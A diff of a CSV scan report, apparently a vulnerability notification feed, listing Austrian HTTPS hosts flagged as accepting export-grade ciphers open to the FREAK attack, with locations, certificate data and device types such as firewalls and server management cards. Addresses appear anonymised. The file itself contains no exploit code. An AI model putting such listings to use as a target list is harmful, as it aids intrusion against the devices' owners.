-2018-04-23 13:27:03,198.51.100.150,443,198-51-100-150.example.net,ssl-freak,TLSv1.0,8559,AT,BURGENLAND,NEUSIEDL AM SEE,TLS_ECDHE_RSA_WITH_RC4_128_SHA,2048,198-51-100-150.example.net,COMODO RSA Domain Validation Secure Server CA,2017-02-08 00:00:00,2019-05-09 23:59:59,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,B6EF6CF436532F0252627393BD7311FD,sha256WithRSAEncryption,rsaEncryption,,Domain Control Validated,,,,,,,,,,,,,GB,SomeState,SomeCity,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:27:06 GMT",N,N,N,N,DV,x509: certificate signed by unknown authority
-2018-04-23 13:27:03,198.51.100.141,443,198-51-100-141.example.net,ssl-freak,TLSv1.0,39372,AT,OBEROSTERREICH,HINTERSTODER,TLS_RSA_WITH_RC4_128_SHA,1024,198-51-100-141.example.net,iLO Default Issuer (Do not trust),2014-01-14 00:00:00,2029-01-13 00:00:00,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,7852761B,sha1WithRSAEncryption,rsaEncryption,,,US,SomeState,SomeCity,,,,,,,,,,US,SomeState,SomeCity,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,,,,,,,,,N,N,N,N,unknown,x509: certificate signed by unknown authority
-2018-04-23 13:27:04,198.51.100.194,443,198-51-100-194.example.net,ssl-freak,TLSv1.0,8447,AT,KARNTEN,GLAN,TLS_RSA_WITH_RC4_128_SHA,1024,iDRAC6 default certificate,iDRAC6 default certificate,2009-09-17 22:47:28,2019-09-15 22:47:28,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,1,sha1WithRSAEncryption,rsaEncryption,,Remote Access Group,US,SomeState,SomeCity,,,,,,,,,Remote Access Group,US,SomeState,SomeCity,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,302,Moved Temporarily,,keep-alive,,,Mbedthis-Appweb/2.4.2,0,,"Mon, 23 Apr 2018 13:25:57 GMT",Y,Y,N,N,unknown,x509: unknown error
+"timestamp","ip","port","hostname","tag","handshake","asn","geo","region","city","cipher_suite","cert_length","subject_common_name","issuer_common_name","cert_issue_date","cert_expiration_date","sha1_fingerprint","cert_serial_number","signature_algorithm","key_algorithm","subject_organization_name","subject_organization_unit_name","subject_country","subject_state_or_province_name","subject_locality_name","subject_street_address","subject_postal_code","subject_surname","subject_given_name","subject_email_address","subject_business_category","subject_serial_number","issuer_organization_name","issuer_organization_unit_name","issuer_country","issuer_state_or_province_name","issuer_locality_name","issuer_street_address","issuer_postal_code","issuer_surname","issuer_given_name","issuer_email_address","issuer_business_category","issuer_serial_number","naics","sic","freak_vulnerable","freak_cipher_suite","sector","sha256_fingerprint","sha512_fingerprint","md5_fingerprint","http_response_type","http_code","http_reason","content_type","http_connection","www_authenticate","set_cookie","server_type","content_length","transfer_encoding","http_date","cert_valid","self_signed","cert_expired","browser_trusted","validation_level","browser_error","device_model","device_sector","device_type","device_vendor","device_version","jarm","page_sha256fp","raw_cert","raw_cert_chain","tlsv13_cipher","tlsv13_support"
+"2018-04-23 13:25:21","198.51.100.232","443",,"ssl-freak","TLSv1.0","8447","AT","WIEN","VIENNA","TLS_RSA_WITH_RC4_128_SHA","1024","usg50_B0B2DC2FA69D","usg50_B0B2DC2FA69D","2012-05-10 00:01:19","2032-05-05 00:01:19","14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2","4FAB054F","sha1WithRSAEncryption","rsaEncryption",,,,,,,,,,,,,,,,,,,,,,,,,"0","0","Y","TLS_RSA_EXPORT_WITH_RC4_40_MD5",,"57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1","E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87","1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE","HTTP/1.1","200","OK","text/html",,,,,,"chunked","Mon, 23 Apr 2018 13:25:26 GMT","Y","Y","N","N","unknown","x509: unknown error",,,,,,,,,,,
+"2018-04-23 13:25:26","198.51.100.224","443","198-51-100-224.example.net","ssl-freak","TLSv1.0","12577","AT","NIEDEROSTERREICH","BADEN","TLS_RSA_WITH_RC4_128_SHA","1024","usg20w_C86C870287EC","usg20w_C86C870287EC","2010-01-01 00:00:53","2029-12-27 00:00:53","14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2","4B3D3B35","sha1WithRSAEncryption","rsaEncryption",,,,,,,,,,,,,,,,,,,,,,,,,"0","0","Y","TLS_RSA_EXPORT_WITH_RC4_40_MD5",,"57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1","E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87","1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE","HTTP/1.1","200","OK","text/html",,,,,,"chunked","Mon, 23 Apr 2018 13:25:29 GMT","Y","Y","N","N","unknown","x509: unknown error",,,,,,,,,,,
+2018-04-23 13:25:21,198.51.100.232,443,,ssl-freak,TLSv1.0,8447,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,usg50_B0B2DC2FA69D,usg50_B0B2DC2FA69D,2012-05-10 00:01:19,2032-05-05 00:01:19,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,4FAB054F,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:25:26 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:25:26,198.51.100.224,443,198-51-100-224.example.net,ssl-freak,TLSv1.0,12577,AT,NIEDEROSTERREICH,BADEN,TLS_RSA_WITH_RC4_128_SHA,1024,usg20w_C86C870287EC,usg20w_C86C870287EC,2010-01-01 00:00:53,2029-12-27 00:00:53,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,4B3D3B35,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:25:29 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:25:33,198.51.100.67,443,,ssl-freak,TLSv1.0,8447,AT,NIEDEROSTERREICH,WAIDHOFEN AN DER THAYA,TLS_RSA_WITH_RC4_128_SHA,1024,Technicolor TG670,Technicolor TG670,2005-01-01 00:00:00,2024-12-31 00:00:00,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,-7A2C610E,sha1WithRSAEncryption,rsaEncryption,Technicolor,1112WT0YK,,,,,,,,,,,Technicolor,1112WT0YK,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,302,Moved Temporarily,,keep-alive,,xAuth_SESSION_ID=bm90aGluZyBoZXJlCg==; path=/;,,0,,"Mon, 23 Apr 2018 14:25:37 GMT",N,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:25:36,198.51.100.3,443,,ssl-freak,TLSv1.2,8445,AT,SALZBURG,HINTERGLEMM,TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,2048,uag2100_04BF6D22A5A9,uag2100_04BF6D22A5A9,2016-03-08 20:27:08,2026-03-06 20:27:08,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,B0F07D300BDB4FC4,sha256WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_DES40_CBC_SHA,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:25:39 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:25:38,198.51.100.198,443,198-51-100-198.example.net,ssl-freak,TLSv1.0,6830,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,2048,198-51-100-198.example.net,Go Daddy Secure Certificate Authority - G2,2016-12-29 08:51:00,2019-12-29 08:51:00,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,AEA6D3637023B56B,sha256WithRSAEncryption,rsaEncryption,,Domain Control Validated,,,,,,,,,,,198-51-100-198.example.net," Inc.""",http://certs.godaddy.com/repository/,SomeState,SomeCity,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,403,Forbidden ( The server,text/html,close,,,,2024,,,Y,N,N,Y,DV,,,,,,,,,,,,
+2018-04-23 13:25:38,198.51.100.98,443,198-51-100-98.example.net,ssl-freak,TLSv1.0,6830,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,usg50_FCF528743754,usg50_FCF528743754,2013-04-29 00:00:26,2033-04-24 00:00:26,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,517DB81A,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:25:40 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:25:41,198.51.100.156,443,198-51-100-156.example.net,ssl-freak,TLSv1.0,8339,AT,NIEDEROSTERREICH,SCHWECHAT,TLS_RSA_WITH_AES_128_CBC_SHA,1024,usg200_404A036775FC,usg200_404A036775FC,2010-05-01 00:04:04,2030-04-26 00:04:04,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,4BDB6FF4,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_DES40_CBC_SHA,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:25:43 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:25:53,198.51.100.200,443,,ssl-freak,TLSv1.2,8447,AT,NIEDEROSTERREICH,KREMS AN DER DONAU,TLS_RSA_WITH_RC4_128_SHA,1024,usg20_5CF4AB67FC6F,usg20_5CF4AB67FC6F,2015-12-02 00:00:47,2035-11-27 00:00:47,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,565E34AF,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:25:56 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:26:02,198.51.100.83,443,198-51-100-83.example.net,ssl-freak,TLSv1.0,6830,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,usg20w_FCF5286F5972,usg20w_FCF5286F5972,2013-03-23 00:00:43,2033-03-18 00:00:43,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,514CF0AB,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:05 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:26:03,198.51.100.155,443,198-51-100-155.example.net,ssl-freak,TLSv1.0,6830,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,198-51-100-155.example.net,198-51-100-155.example.net,2018-03-19 19:47:07,2023-03-19 19:47:07,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,2DF52AA905C7A2B44C2B9F0012FD5745,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,403,Forbidden,text/html,,,,Microsoft-IIS/6.0,1939,,"Mon, 23 Apr 2018 13:11:52 GMT",N,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:26:03,198.51.100.129,443,198-51-100-129.example.net,ssl-freak,TLSv1.0,29654,AT,SALZBURG,SALZBURG,TLS_RSA_WITH_RC4_128_SHA,1024,localhost,localhost,2007-01-31 19:00:29,2008-01-31 19:00:29,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,2,sha1WithRSAEncryption,rsaEncryption,Apache HTTP Server,Test Certificate,,,,,,,,,,,Apache HTTP Server,For testing purposes only,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,Apache,318,,"Mon, 23 Apr 2018 17:42:37 GMT",N,N,Y,N,unknown,x509: certificate signed by unknown authority,,,,,,,,,,,
+2018-04-23 13:26:12,198.51.100.7,443,198-51-100-7.example.net,ssl-freak,TLSv1.0,8445,AT,SALZBURG,ALTENMARKT IM PONGAU,TLS_RSA_WITH_RC4_128_SHA,2048,IMM2-5cf3fcaf3abd,IMM2-5cf3fcaf3abd,2013-03-22 14:32:06,2023-03-20 14:32:06,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,D8C631398B585F10,sha1WithRSAEncryption,rsaEncryption,System X,,US,SomeState,SomeCity,,,,,,,,System X,,US,SomeState,SomeCity,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,301,Moved Permanently,application/x-appweb-php,keep-alive,,,Mbedthis-Appweb/2.4.2,0,,"Mon, 23 Apr 2018 13:37:08 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:26:15,198.51.100.93,443,,ssl-freak,TLSv1.2,8447,AT,KARNTEN,SPITTAL AN DER DRAU,TLS_RSA_WITH_RC4_128_SHA,1024,usg50_B0B2DC3308EF,usg50_B0B2DC3308EF,2012-05-25 00:00:39,2032-05-20 00:00:39,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,4FBECBA7,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:17 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:26:16,198.51.100.81,443,198-51-100-81.example.net,ssl-freak,TLSv1.0,5385,AT,VORARLBERG,FELDKIRCH,TLS_RSA_WITH_RC4_128_SHA,1024,usg100_5067F03642A5,usg100_5067F03642A5,2010-10-01 00:04:48,2030-09-26 00:04:48,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,4CA525A0,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,518210,737415,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:19 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-23 13:26:17,198.51.100.162,443,198-51-100-162.example.net,ssl-freak,TLSv1.0,6830,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,rc1,Peppercon CA,2003-05-08 16:30:05,2008-05-06 16:30:05,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,18,md5WithRSAEncryption,rsaEncryption,,R&D,DE,SomeState,,,,,,198-51-100-162.example.net,,,,Security Department,DE,SomeState,SomeCity,,,,,198-51-100-162.example.net,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,302,Redirect,,,,,,,,,N,N,Y,N,unknown,x509: certificate signed by unknown authority,,,,,,,,,,,
+2018-04-23 13:26:22,198.51.100.57,443,,ssl-freak,TLSv1.0,8447,AT,STEIERMARK,GLEISDORF,TLS_RSA_WITH_RC4_128_SHA,1024,usg20_5CF4AB661192,usg20_5CF4AB661192,2015-09-22 00:00:46,2035-09-17 00:00:46,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,56009A2E,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:25 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
